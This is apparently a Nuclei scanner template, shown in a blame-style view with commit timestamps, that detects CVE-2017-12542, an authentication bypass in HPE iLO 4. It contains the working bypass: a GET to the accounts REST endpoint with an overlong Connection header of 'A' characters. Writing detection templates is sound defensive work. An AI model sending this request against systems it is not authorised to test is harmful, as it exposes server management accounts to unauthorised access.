2021-03-23 11:26:08 +00:00
|
|
|
id: CVE-2017-12542
|
|
|
|
|
|
|
|
info:
|
2022-05-12 14:04:18 +00:00
|
|
|
name: HPE Integrated Lights-out 4 (ILO4) <2.53 - Authentication Bypass
|
2021-03-23 11:26:08 +00:00
|
|
|
author: pikpikcu
|
|
|
|
severity: critical
|
2022-05-12 14:04:18 +00:00
|
|
|
description: HPE Integrated Lights-out 4 (iLO 4) prior to 2.53 was found to contain an authentication bypass and code execution vulnerability.
|
2021-08-18 11:37:49 +00:00
|
|
|
reference:
|
2021-08-19 14:44:46 +00:00
|
|
|
- https://www.exploit-db.com/exploits/44005
|
2022-05-12 14:04:18 +00:00
|
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2017-12542
|
2022-05-17 09:18:12 +00:00
|
|
|
- https://support.hpe.com/hpsc/doc/public/display?docId=emr_na-hpesbhf03769en_us
|
|
|
|
- https://www.exploit-db.com/exploits/44005/
|
2021-09-10 11:26:40 +00:00
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
|
2022-05-17 09:18:12 +00:00
|
|
|
cvss-score: 10
|
2021-09-10 11:26:40 +00:00
|
|
|
cve-id: CVE-2017-12542
|
2022-08-27 04:41:18 +00:00
|
|
|
tags: ilo4,hpe,auth-bypass,edb,cve,cve2017
|
2021-03-23 11:26:08 +00:00
|
|
|
|
|
|
|
requests:
|
|
|
|
- method: GET
|
|
|
|
path:
|
|
|
|
- "{{BaseURL}}/rest/v1/AccountService/Accounts"
|
2022-05-12 14:04:18 +00:00
|
|
|
|
2021-03-23 11:26:08 +00:00
|
|
|
headers:
|
|
|
|
Connection: AAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: word
|
2022-05-12 14:04:18 +00:00
|
|
|
part: body
|
2021-03-23 11:26:08 +00:00
|
|
|
words:
|
|
|
|
- "iLO User"
|
2021-04-17 15:48:58 +00:00
|
|
|
|
|
|
|
- type: word
|
2022-05-12 14:04:18 +00:00
|
|
|
part: header
|
2021-04-17 15:48:58 +00:00
|
|
|
words:
|
|
|
|
- "application/json"
|
2021-03-23 11:26:08 +00:00
|
|
|
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|
2022-05-12 14:04:18 +00:00
|
|
|
|
|
|
|
# Enhanced by mp on 2022/05/11
|